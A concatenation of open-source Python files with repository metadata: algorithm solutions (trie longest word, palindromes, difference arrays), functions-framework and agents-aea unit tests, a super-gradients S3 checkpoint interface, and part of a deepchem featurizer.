node.is_end = True
class Solution:
def longestWord(self, words: List[str]) -> str:
trie = Trie()
for word in words:
trie.insert(word)
return ''.join(self.__get_word(trie.root))
def __get_word(self, node):
print(node.is_end)
if not node.is_end:
            # we reach here when is_end is False
return []
if not node.children:
            # we reach here when children is empty
return [node.key]
        # leaf nodes and the root node
li = [self.__get_word(c) for c in node.children.values()]
n = len(max(li, key=len))
print(li)
li = [i for i in li if len(i) == n]
li.sort()
print('debug', node.key, li)
return [node.key] + li[0]
if __name__ == '__main__':
words = ["a", "banana", "app", "appl", "ap", "apply", "apple"]
solution = Solution()
result = solution.longestWord(words)
print(result)
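Since the file name itself flags the trie solution as hard to follow, here is a simpler non-trie approach to the same problem for comparison; it is an independent sketch, not part of the original file.
# Alternative sketch: sort the words, then greedily keep a word only if everything but
# its last character has already been built; ties are broken lexicographically by the sort.
def longest_word_simple(words):
    built, best = {""}, ""
    for word in sorted(words):
        if word[:-1] in built:
            built.add(word)
            if len(word) > len(best):
                best = word
    return best

assert longest_word_simple(["a", "banana", "app", "appl", "ap", "apply", "apple"]) == "apple"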
|
9b2c18e9718eda06660bcf0b40cb5e199176f592
|
9ed4d46aedd4d4acadb48d610e940594b5b7b3fd
|
/strings/palindrome.py
|
bfdb3ddcf3961c7a051fe1235f5291d2eca08848
|
[
"MIT",
"Giftware",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
TheAlgorithms/Python
|
7596a0e236ed12a61f9db19a7ea68309779cc85b
|
421ace81edb0d9af3a173f4ca7e66cc900078c1d
|
refs/heads/master
| 2023-09-01T17:32:20.190949
| 2023-08-29T13:18:10
| 2023-08-29T13:18:10
| 63,476,337
| 184,217
| 48,615
|
MIT
| 2023-09-14T02:05:29
| 2016-07-16T09:44:01
|
Python
|
UTF-8
|
Python
| false
| false
| 2,975
|
py
|
palindrome.py
|
# Algorithms to determine if a string is palindrome
from timeit import timeit
test_data = {
"MALAYALAM": True,
"String": False,
"rotor": True,
"level": True,
"A": True,
"BB": True,
"ABC": False,
"amanaplanacanalpanama": True, # "a man a plan a canal panama"
}
# Ensure our test data is valid
assert all((key == key[::-1]) is value for key, value in test_data.items())
def is_palindrome(s: str) -> bool:
"""
Return True if s is a palindrome otherwise return False.
>>> all(is_palindrome(key) is value for key, value in test_data.items())
True
"""
start_i = 0
end_i = len(s) - 1
while start_i < end_i:
if s[start_i] == s[end_i]:
start_i += 1
end_i -= 1
else:
return False
return True
def is_palindrome_traversal(s: str) -> bool:
"""
Return True if s is a palindrome otherwise return False.
>>> all(is_palindrome_traversal(key) is value for key, value in test_data.items())
True
"""
end = len(s) // 2
n = len(s)
# We need to traverse till half of the length of string
# as we can get access of the i'th last element from
# i'th index.
# eg: [0,1,2,3,4,5] => 4th index can be accessed
# with the help of 1st index (i==n-i-1)
# where n is length of string
return all(s[i] == s[n - i - 1] for i in range(end))
def is_palindrome_recursive(s: str) -> bool:
"""
Return True if s is a palindrome otherwise return False.
>>> all(is_palindrome_recursive(key) is value for key, value in test_data.items())
True
"""
if len(s) <= 2:
return True
if s[0] == s[len(s) - 1]:
return is_palindrome_recursive(s[1:-1])
else:
return False
def is_palindrome_slice(s: str) -> bool:
"""
Return True if s is a palindrome otherwise return False.
>>> all(is_palindrome_slice(key) is value for key, value in test_data.items())
True
"""
return s == s[::-1]
def benchmark_function(name: str) -> None:
stmt = f"all({name}(key) is value for key, value in test_data.items())"
setup = f"from __main__ import test_data, {name}"
number = 500000
result = timeit(stmt=stmt, setup=setup, number=number)
print(f"{name:<35} finished {number:,} runs in {result:.5f} seconds")
if __name__ == "__main__":
for key, value in test_data.items():
assert is_palindrome(key) is is_palindrome_recursive(key)
assert is_palindrome(key) is is_palindrome_slice(key)
print(f"{key:21} {value}")
print("a man a plan a canal panama")
# finished 500,000 runs in 0.46793 seconds
benchmark_function("is_palindrome_slice")
# finished 500,000 runs in 0.85234 seconds
benchmark_function("is_palindrome")
# finished 500,000 runs in 1.32028 seconds
benchmark_function("is_palindrome_recursive")
# finished 500,000 runs in 2.08679 seconds
benchmark_function("is_palindrome_traversal")
|
a79c1181b3866142475e78d7d8895cf1ca8488ca
|
f305f84ea6f721c2391300f0a60e21d2ce14f2a5
|
/22_专题/前缀与差分/差分数组/370. 区间加法-差分模板.py
|
efd606023048fe25d60cf69db6e2a23f2c26ed37
|
[] |
no_license
|
981377660LMT/algorithm-study
|
f2ada3e6959338ae1bc21934a84f7314a8ecff82
|
7e79e26bb8f641868561b186e34c1127ed63c9e0
|
refs/heads/master
| 2023-09-01T18:26:16.525579
| 2023-09-01T12:21:58
| 2023-09-01T12:21:58
| 385,861,235
| 225
| 24
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 690
|
py
|
370. 区间加法-差分模板.py
|
from typing import List
# Assume you have an array of length n whose entries are all 0 initially, and you are given k update operations.
# Return the array after all k updates have been applied.
class Solution:
def getModifiedArray(self, length: int, updates: List[List[int]]) -> List[int]:
res = [0] * (length + 1)
for left, right, delta in updates:
res[left] += delta
res[right + 1] -= delta
for i in range(1, length + 1):
res[i] += res[i - 1]
return res[:-1]
print(Solution().getModifiedArray(length=5, updates=[[1, 3, 2], [2, 4, 3], [0, 2, -2]]))
# Output: [-2,0,3,5,3]
|
d852008afac8ab352534fc4de9507c5ed78c3815
|
a4ded6a73551bcb7cb3d70679f07a8f31a165465
|
/tests/test_view_functions.py
|
f69b21557bc29a1ef17656debc7c21b7bf7d1891
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
GoogleCloudPlatform/functions-framework-python
|
d324c4d99f0bb59bda3b930872f1294417e6cf93
|
45aed538b5e39655318c7841457399fa3376ceaf
|
refs/heads/main
| 2023-09-05T08:05:03.935120
| 2023-08-28T23:28:46
| 2023-08-28T23:28:46
| 231,433,569
| 740
| 136
|
Apache-2.0
| 2023-09-08T00:40:30
| 2020-01-02T18:01:56
|
Python
|
UTF-8
|
Python
| false
| false
| 7,354
|
py
|
test_view_functions.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import pretend
import pytest
import werkzeug
from cloudevents.http import from_http
import functions_framework
def test_http_view_func_wrapper():
function = pretend.call_recorder(lambda request: "Hello")
request_object = pretend.stub()
local_proxy = pretend.stub(_get_current_object=lambda: request_object)
view_func = functions_framework._http_view_func_wrapper(function, local_proxy)
view_func("/some/path")
assert function.calls == [pretend.call(request_object)]
def test_http_view_func_wrapper_attribute_copied():
def function(_):
pass
function.attribute = "foo"
view_func = functions_framework._http_view_func_wrapper(function, pretend.stub())
assert view_func.__name__ == "function"
assert view_func.attribute == "foo"
def test_event_view_func_wrapper(monkeypatch):
data = pretend.stub()
json = {
"context": {
"eventId": "some-eventId",
"timestamp": "some-timestamp",
"eventType": "some-eventType",
"resource": "some-resource",
},
"data": data,
}
request = pretend.stub(headers={}, get_json=lambda: json)
context_stub = pretend.stub()
context_class = pretend.call_recorder(lambda *a, **kw: context_stub)
monkeypatch.setattr(functions_framework, "Context", context_class)
function = pretend.call_recorder(lambda data, context: "Hello")
view_func = functions_framework._event_view_func_wrapper(function, request)
view_func("/some/path")
assert function.calls == [pretend.call(data, context_stub)]
assert context_class.calls == [
pretend.call(
eventId="some-eventId",
timestamp="some-timestamp",
eventType="some-eventType",
resource="some-resource",
)
]
def test_event_view_func_wrapper_bad_request(monkeypatch):
request = pretend.stub(headers={}, get_json=lambda: None)
context_stub = pretend.stub()
context_class = pretend.call_recorder(lambda *a, **kw: context_stub)
monkeypatch.setattr(functions_framework, "Context", context_class)
function = pretend.call_recorder(lambda data, context: "Hello")
view_func = functions_framework._event_view_func_wrapper(function, request)
with pytest.raises(werkzeug.exceptions.BadRequest):
view_func("/some/path")
def test_run_cloud_event():
headers = {"Content-Type": "application/cloudevents+json"}
data = json.dumps(
{
"source": "from-galaxy-far-far-away",
"type": "cloud_event.greet.you",
"specversion": "1.0",
"id": "f6a65fcd-eed2-429d-9f71-ec0663d83025",
"time": "2020-08-13T02:12:14.946587+00:00",
"data": {"name": "john"},
}
)
request = pretend.stub(headers=headers, get_data=lambda: data)
function = pretend.call_recorder(lambda cloud_event: "hello")
functions_framework._run_cloud_event(function, request)
expected_cloud_event = from_http(request.headers, request.get_data())
assert function.calls == [pretend.call(expected_cloud_event)]
def test_cloud_event_view_func_wrapper():
headers = {"Content-Type": "application/cloudevents+json"}
data = json.dumps(
{
"source": "from-galaxy-far-far-away",
"type": "cloud_event.greet.you",
"specversion": "1.0",
"id": "f6a65fcd-eed2-429d-9f71-ec0663d83025",
"time": "2020-08-13T02:12:14.946587+00:00",
"data": {"name": "john"},
}
)
request = pretend.stub(headers=headers, get_data=lambda: data)
event = from_http(request.headers, request.get_data())
function = pretend.call_recorder(lambda cloud_event: cloud_event)
view_func = functions_framework._cloud_event_view_func_wrapper(function, request)
view_func("/some/path")
assert function.calls == [pretend.call(event)]
def test_binary_cloud_event_view_func_wrapper():
headers = {
"ce-specversion": "1.0",
"ce-source": "from-galaxy-far-far-away",
"ce-type": "cloud_event.greet.you",
"ce-id": "f6a65fcd-eed2-429d-9f71-ec0663d83025",
"ce-time": "2020-08-13T02:12:14.946587+00:00",
}
data = json.dumps({"name": "john"})
request = pretend.stub(headers=headers, get_data=lambda: data)
event = from_http(request.headers, request.get_data())
function = pretend.call_recorder(lambda cloud_event: cloud_event)
view_func = functions_framework._cloud_event_view_func_wrapper(function, request)
view_func("/some/path")
assert function.calls == [pretend.call(event)]
def test_binary_event_view_func_wrapper(monkeypatch):
data = pretend.stub()
request = pretend.stub(
headers={
"ce-type": "something",
"ce-specversion": "something",
"ce-source": "something",
"ce-id": "something",
"ce-eventId": "some-eventId",
"ce-timestamp": "some-timestamp",
"ce-eventType": "some-eventType",
"ce-resource": "some-resource",
},
get_data=lambda: data,
)
context_stub = pretend.stub()
context_class = pretend.call_recorder(lambda *a, **kw: context_stub)
monkeypatch.setattr(functions_framework, "Context", context_class)
function = pretend.call_recorder(lambda data, context: "Hello")
view_func = functions_framework._event_view_func_wrapper(function, request)
view_func("/some/path")
assert function.calls == [pretend.call(data, context_stub)]
assert context_class.calls == [
pretend.call(
eventId="some-eventId",
timestamp="some-timestamp",
eventType="some-eventType",
resource="some-resource",
)
]
def test_legacy_event_view_func_wrapper(monkeypatch):
data = pretend.stub()
json = {
"eventId": "some-eventId",
"timestamp": "some-timestamp",
"eventType": "some-eventType",
"resource": "some-resource",
"data": data,
}
request = pretend.stub(headers={}, get_json=lambda: json)
context_stub = pretend.stub()
context_class = pretend.call_recorder(lambda *a, **kw: context_stub)
monkeypatch.setattr(functions_framework, "Context", context_class)
function = pretend.call_recorder(lambda data, context: "Hello")
view_func = functions_framework._event_view_func_wrapper(function, request)
view_func("/some/path")
assert function.calls == [pretend.call(data, context_stub)]
assert context_class.calls == [
pretend.call(
eventId="some-eventId",
timestamp="some-timestamp",
eventType="some-eventType",
resource="some-resource",
)
]
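# --- Additional illustrative test (not part of the original suite) ---
# A minimal sketch assuming _http_view_func_wrapper returns whatever the
# wrapped function returns; it mirrors the style of the tests above.
def test_http_view_func_wrapper_return_value():
    function = pretend.call_recorder(lambda request: "Hello")
    request_object = pretend.stub()
    local_proxy = pretend.stub(_get_current_object=lambda: request_object)
    view_func = functions_framework._http_view_func_wrapper(function, local_proxy)
    assert view_func("/some/path") == "Hello"
    assert function.calls == [pretend.call(request_object)]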
|
0d4d76a2a6c7764fd7cfbeb14cc0483f6bb41986
|
019f03d6713a2bc5344b644aeb5ebe70aaf7cfd0
|
/src/super_gradients/common/data_interface/adnn_model_repository_data_interface.py
|
0011ff44695448b91dc49a8336c12e1333e86dbd
|
[
"LicenseRef-scancode-proprietary-license",
"Apache-2.0"
] |
permissive
|
Deci-AI/super-gradients
|
6f52cd15bc2f9f39e3cdc6067292b6512aba5dd0
|
7240726cf6425b53a26ed2faec03672f30fee6be
|
refs/heads/master
| 2023-08-25T17:47:02.595029
| 2023-08-24T11:50:50
| 2023-08-24T11:50:50
| 432,652,408
| 3,237
| 331
|
Apache-2.0
| 2023-09-14T11:24:46
| 2021-11-28T07:58:02
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 9,699
|
py
|
adnn_model_repository_data_interface.py
|
import os
import sys
from super_gradients.common.data_connection.s3_connector import S3Connector
from super_gradients.common.decorators.explicit_params_validator import explicit_params_validation
from super_gradients.common.environment.env_variables import env_variables
from super_gradients.common.abstractions.abstract_logger import ILogger
class ModelCheckpointNotFoundException(RuntimeError):
pass
class ADNNModelRepositoryDataInterfaces(ILogger):
"""
ResearchModelRepositoryDataInterface
"""
def __init__(self, data_connection_location: str = "local", data_connection_credentials: str = None):
"""
ModelCheckpointsDataInterface
:param data_connection_location: 'local' or s3 bucket 's3://my-bucket-name'
:param data_connection_credentials: credentials string
            - name of aws profile in case data_connection_source is s3; will be taken from the environment
              variable AWS_PROFILE if left empty
"""
super().__init__()
self.tb_events_file_prefix = "events.out.tfevents"
self.log_file_prefix = "experiment_logs_"
self.latest_checkpoint_filename = "ckpt_latest.pth"
self.best_checkpoint_filename = "ckpt_best.pth"
if data_connection_location.startswith("s3"):
assert data_connection_location.index("s3://") >= 0, "S3 path must be formatted s3://bucket-name"
self.model_repo_bucket_name = data_connection_location.split("://")[1]
self.data_connection_source = "s3"
if data_connection_credentials is None:
data_connection_credentials = env_variables.AWS_PROFILE
self.s3_connector = S3Connector(data_connection_credentials, self.model_repo_bucket_name)
@explicit_params_validation(validation_type="None")
def load_all_remote_log_files(self, model_name: str, model_checkpoint_local_dir: str):
"""
load_all_remote_checkpoint_files
:param model_name:
:param model_checkpoint_local_dir:
:return:
"""
self.load_remote_logging_files(model_name=model_name, model_checkpoint_dir_name=model_checkpoint_local_dir, logging_type="tensorboard")
self.load_remote_logging_files(model_name=model_name, model_checkpoint_dir_name=model_checkpoint_local_dir, logging_type="text")
@explicit_params_validation(validation_type="None")
def save_all_remote_checkpoint_files(self, model_name: str, model_checkpoint_local_dir: str, log_file_name: str):
"""
save_all_remote_checkpoint_files - Saves all of the local Checkpoint data into Remote Repo
:param model_name: The Model Name to store in Remote Repo
:param model_checkpoint_local_dir: Local directory with the relevant data to upload
:param log_file_name: The log_file name (Created independently)
"""
for checkpoint_file_name in [self.latest_checkpoint_filename, self.best_checkpoint_filename]:
self.save_remote_checkpoints_file(model_name, model_checkpoint_local_dir, checkpoint_file_name)
self.save_remote_checkpoints_file(model_name, model_checkpoint_local_dir, log_file_name)
self.save_remote_tensorboard_event_files(model_name, model_checkpoint_local_dir)
@explicit_params_validation(validation_type="None")
def load_remote_checkpoints_file(
self, ckpt_source_remote_dir: str, ckpt_destination_local_dir: str, ckpt_file_name: str, overwrite_local_checkpoints_file: bool = False
) -> str:
"""
load_remote_checkpoints_file - Loads a model's checkpoint from local/cloud file
:param ckpt_source_remote_dir: The source folder to download from
:param ckpt_destination_local_dir: The destination folder to save the checkpoint at
:param ckpt_file_name: Filename to load from Remote Repo
        :param overwrite_local_checkpoints_file: Use only for cloud-stored model checkpoints, when the required
                                                 behavior is to overwrite a previous version of the same files
:return: Model Checkpoint File Path -> Depends on model architecture
"""
ckpt_file_local_full_path = ckpt_destination_local_dir + "/" + ckpt_file_name
if self.data_connection_source == "s3":
if overwrite_local_checkpoints_file:
# DELETE THE LOCAL VERSION ON THE MACHINE
if os.path.exists(ckpt_file_local_full_path):
os.remove(ckpt_file_local_full_path)
key_to_download = ckpt_source_remote_dir + "/" + ckpt_file_name
download_success = self.s3_connector.download_key(target_path=ckpt_file_local_full_path, key_to_download=key_to_download)
if not download_success:
failed_download_path = "s3://" + self.model_repo_bucket_name + "/" + key_to_download
error_msg = "Failed to Download Model Checkpoint from " + failed_download_path
self._logger.error(error_msg)
raise ModelCheckpointNotFoundException(error_msg)
return ckpt_file_local_full_path
@explicit_params_validation(validation_type="NoneOrEmpty")
def load_remote_logging_files(self, model_name: str, model_checkpoint_dir_name: str, logging_type: str):
"""
        load_remote_logging_files - Downloads all of the remote logging files (tb_events or text logs) from the remote repository
:param model_name:
:param model_checkpoint_dir_name:
:param logging_type:
:return:
"""
if not os.path.isdir(model_checkpoint_dir_name):
raise ValueError("[" + sys._getframe().f_code.co_name + "] - Provided directory does not exist")
# LOADS THE DATA FROM THE REMOTE REPOSITORY
s3_bucket_path_prefix = model_name
if logging_type == "tensorboard":
if self.data_connection_source == "s3":
self.s3_connector.download_keys_by_prefix(
s3_bucket_path_prefix=s3_bucket_path_prefix, local_download_dir=model_checkpoint_dir_name, s3_file_path_prefix=self.tb_events_file_prefix
)
elif logging_type == "text":
if self.data_connection_source == "s3":
self.s3_connector.download_keys_by_prefix(
s3_bucket_path_prefix=s3_bucket_path_prefix, local_download_dir=model_checkpoint_dir_name, s3_file_path_prefix=self.log_file_prefix
)
@explicit_params_validation(validation_type="NoneOrEmpty")
def save_remote_checkpoints_file(self, model_name: str, model_checkpoint_local_dir: str, checkpoints_file_name: str) -> bool:
"""
save_remote_checkpoints_file - Saves a Checkpoints file in the Remote Repo
:param model_name: The Model Name for S3 Prefix
:param model_checkpoint_local_dir: Model Directory - Based on Model name
:param checkpoints_file_name: Filename to upload to Remote Repo
:return: True/False for Operation Success/Failure
"""
# LOAD THE LOCAL VERSION
model_checkpoint_file_full_path = model_checkpoint_local_dir + "/" + checkpoints_file_name
# SAVE ON THE REMOTE S3 REPOSITORY
if self.data_connection_source == "s3":
model_checkpoint_s3_in_bucket_path = model_name + "/" + checkpoints_file_name
return self.__update_or_upload_s3_key(model_checkpoint_file_full_path, model_checkpoint_s3_in_bucket_path)
@explicit_params_validation(validation_type="NoneOrEmpty")
def save_remote_tensorboard_event_files(self, model_name: str, model_checkpoint_dir_name: str):
"""
save_remote_tensorboard_event_files - Saves all of the tensorboard files remotely
:param model_name: Prefix for Cloud Storage
:param model_checkpoint_dir_name: The directory where the files are stored in
"""
if not os.path.isdir(model_checkpoint_dir_name):
raise ValueError("[" + sys._getframe().f_code.co_name + "] - Provided directory does not exist")
for tb_events_file_name in os.listdir(model_checkpoint_dir_name):
if tb_events_file_name.startswith(self.tb_events_file_prefix):
upload_success = self.save_remote_checkpoints_file(
model_name=model_name, model_checkpoint_local_dir=model_checkpoint_dir_name, checkpoints_file_name=tb_events_file_name
)
if not upload_success:
self._logger.error("Failed to upload tb_events_file: " + tb_events_file_name)
@explicit_params_validation(validation_type="NoneOrEmpty")
def __update_or_upload_s3_key(self, local_file_path: str, s3_key_path: str):
"""
__update_or_upload_s3_key - Uploads/Updates an S3 Key based on a local file path
:param local_file_path: The Local file path to upload to S3
:param s3_key_path: The S3 path to create/update the S3 Key
"""
if self.s3_connector.check_key_exists(s3_key_path):
# DELETE KEY TO UPDATE THE FILE IN S3
delete_response = self.s3_connector.delete_key(s3_key_path)
if delete_response:
self._logger.info("Removed previous checkpoint from S3")
upload_success = self.s3_connector.upload_file(local_file_path, s3_key_path)
if not upload_success:
self._logger.error("Failed to upload model checkpoint")
return upload_success
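# --- Usage sketch (illustrative; not part of the original module) ---
# A minimal example of driving the interface against an S3-backed model
# repository. The bucket name, AWS profile, directories and file names are
# hypothetical placeholders, and real AWS credentials would be required.
if __name__ == "__main__":
    interface = ADNNModelRepositoryDataInterfaces(
        data_connection_location="s3://my-model-repo",
        data_connection_credentials="my-aws-profile",
    )
    # Download the "best" checkpoint of a model into a local directory.
    local_ckpt_path = interface.load_remote_checkpoints_file(
        ckpt_source_remote_dir="resnet50_experiment",
        ckpt_destination_local_dir="/tmp/checkpoints",
        ckpt_file_name="ckpt_best.pth",
        overwrite_local_checkpoints_file=True,
    )
    print(local_ckpt_path)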
|
055e2f5fcc1974fc3f843c905690a517238cd37c
|
ea57d267ab31480d8d731b2c095e9da9ad989133
|
/tests/test_packages/test_skills/test_tac_negotiation/test_helpers.py
|
19d2fc0852def6b2026f84d1e26b3aff4026d575
|
[
"Apache-2.0"
] |
permissive
|
fetchai/agents-aea
|
6d034f1db6f3beacf31dac2f5a1baaa60c8edb7d
|
bec49adaeba661d8d0f03ac9935dc89f39d95a0d
|
refs/heads/main
| 2023-08-08T23:19:06.276643
| 2023-02-04T10:46:39
| 2023-02-04T10:46:39
| 203,558,879
| 192
| 58
|
Apache-2.0
| 2023-07-19T04:45:26
| 2019-08-21T10:12:47
|
Python
|
UTF-8
|
Python
| false
| false
| 10,674
|
py
|
test_helpers.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2023 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests of the helpers module of the tac negotiation."""
from pathlib import Path
from aea.helpers.search.models import (
Attribute,
Constraint,
ConstraintType,
DataModel,
Description,
)
from aea.test_tools.test_skill import BaseSkillTestCase
from packages.fetchai.skills.tac_negotiation.helpers import (
DEMAND_DATAMODEL_NAME,
SUPPLY_DATAMODEL_NAME,
_build_goods_datamodel,
build_goods_description,
build_goods_query,
)
from tests.conftest import ROOT_DIR
class TestHelpers(BaseSkillTestCase):
"""Test Helper module methods of tac control."""
path_to_skill = Path(ROOT_DIR, "packages", "fetchai", "skills", "tac_negotiation")
@classmethod
def setup(cls):
"""Setup the test class."""
super().setup()
def test_build_goods_datamodel_supply(self):
"""Test the _build_goods_datamodel of Helpers module for a supply."""
good_ids = ["1", "2"]
is_supply = True
attributes = [
Attribute("1", int, True, "A good on offer."),
Attribute("2", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(SUPPLY_DATAMODEL_NAME, attributes)
actual_data_model = _build_goods_datamodel(good_ids, is_supply)
assert actual_data_model == expected_data_model
def test_build_goods_datamodel_demand(self):
"""Test the _build_goods_datamodel of Helpers module for a demand."""
good_ids = ["1", "2"]
is_supply = False
attributes = [
Attribute("1", int, True, "A good on offer."),
Attribute("2", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(DEMAND_DATAMODEL_NAME, attributes)
actual_data_model = _build_goods_datamodel(good_ids, is_supply)
assert actual_data_model == expected_data_model
def test_build_goods_description_supply(self):
"""Test the build_goods_description of Helpers module for supply."""
quantities_by_good_id = {"2": 5, "3": 10}
currency_id = "1"
ledger_id = "some_ledger_id"
is_supply = True
attributes = [
Attribute("2", int, True, "A good on offer."),
Attribute("3", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(SUPPLY_DATAMODEL_NAME, attributes)
expected_values = {"currency_id": currency_id, "ledger_id": ledger_id}
expected_values.update(quantities_by_good_id)
expected_description = Description(expected_values, expected_data_model)
actual_description = build_goods_description(
quantities_by_good_id, currency_id, ledger_id, is_supply
)
assert actual_description == expected_description
def test_build_goods_description_demand(self):
"""Test the build_goods_description of Helpers module for demand (same as above)."""
quantities_by_good_id = {"2": 5, "3": 10}
currency_id = "1"
ledger_id = "some_ledger_id"
is_supply = False
attributes = [
Attribute("2", int, True, "A good on offer."),
Attribute("3", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(DEMAND_DATAMODEL_NAME, attributes)
expected_values = {"currency_id": currency_id, "ledger_id": ledger_id}
expected_values.update(quantities_by_good_id)
expected_description = Description(expected_values, expected_data_model)
actual_description = build_goods_description(
quantities_by_good_id, currency_id, ledger_id, is_supply
)
assert actual_description == expected_description
def test_build_goods_query(self):
"""Test the build_goods_query of Helpers module."""
good_ids = ["2", "3"]
currency_id = "1"
ledger_id = "some_ledger_id"
is_searching_for_sellers = True
attributes = [
Attribute("2", int, True, "A good on offer."),
Attribute("3", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(SUPPLY_DATAMODEL_NAME, attributes)
expected_constraints = [
Constraint("2", ConstraintType(">=", 1)),
Constraint("3", ConstraintType(">=", 1)),
Constraint("ledger_id", ConstraintType("==", ledger_id)),
Constraint("currency_id", ConstraintType("==", currency_id)),
]
actual_query = build_goods_query(
good_ids, currency_id, ledger_id, is_searching_for_sellers
)
constraints = [
(c.constraint_type.type, c.constraint_type.value)
for c in actual_query.constraints[0].constraints
]
for constraint in expected_constraints:
assert (
constraint.constraint_type.type,
constraint.constraint_type.value,
) in constraints
assert actual_query.model == expected_data_model
def test_build_goods_query_1_good(self):
"""Test the build_goods_query of Helpers module where there is 1 good."""
good_ids = ["2"]
currency_id = "1"
ledger_id = "some_ledger_id"
is_searching_for_sellers = True
attributes = [
Attribute("2", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(SUPPLY_DATAMODEL_NAME, attributes)
expected_constraints = [
Constraint("2", ConstraintType(">=", 1)),
Constraint("ledger_id", ConstraintType("==", ledger_id)),
Constraint("currency_id", ConstraintType("==", currency_id)),
]
actual_query = build_goods_query(
good_ids, currency_id, ledger_id, is_searching_for_sellers
)
for constraint in expected_constraints:
assert constraint in actual_query.constraints
assert actual_query.model == expected_data_model
|
052a55a981d5523aec693e2100805f9c6125e2f1
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/testData/resolve/multiFile/importOsPath/yos/__init__.py
|
e87f1d2c7a3017b77c3ca9af54fdf6079f945022
|
[
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 32
|
py
|
__init__.py
|
def makedir(foo):
    print(foo)
|
79365c2aec95e79224a3ba87a0642d09b0782a14
|
39b021eabbb8e3be1734cf92fd641965a796b0eb
|
/deepchem/feat/material_featurizers/element_property_fingerprint.py
|
c7bb2ee5039d06377509d0f11b09f49bc451a81b
|
[
"MIT"
] |
permissive
|
deepchem/deepchem
|
066cbf42316b2f6bec0166727e0264a485d5266f
|
ee6e67ebcf7bf04259cf13aff6388e2b791fea3d
|
refs/heads/master
| 2023-09-02T01:32:17.860111
| 2023-08-31T18:49:00
| 2023-08-31T18:49:00
| 43,098,215
| 4,876
| 1,905
|
MIT
| 2023-09-14T19:10:44
| 2015-09-24T23:20:28
|
Python
|
UTF-8
|
Python
| false
| false
| 3,508
|
py
|
element_property_fingerprint.py
|
import numpy as np
from deepchem.utils.typing import PymatgenComposition
from deepchem.feat import MaterialCompositionFeaturizer
from typing import Any
class ElementPropertyFingerprint(MaterialCompositionFeaturizer):
"""
Fingerprint of elemental properties from composition.
Based on the data source chosen, returns properties and statistics
(min, max, range, mean, standard deviation, mode) for a compound
based on elemental stoichiometry. E.g., the average electronegativity
of atoms in a crystal structure. The chemical fingerprint is a
vector of these statistics. For a full list of properties and statistics,
see ``matminer.featurizers.composition.ElementProperty(data_source).feature_labels()``.
This featurizer requires the optional dependencies pymatgen and
matminer. It may be useful when only crystal compositions are available
(and not 3D coordinates).
See references [1]_, [2]_, [3]_, [4]_ for more details.
References
----------
.. [1] MagPie data: Ward, L. et al. npj Comput Mater 2, 16028 (2016).
https://doi.org/10.1038/npjcompumats.2016.28
.. [2] Deml data: Deml, A. et al. Physical Review B 93, 085142 (2016).
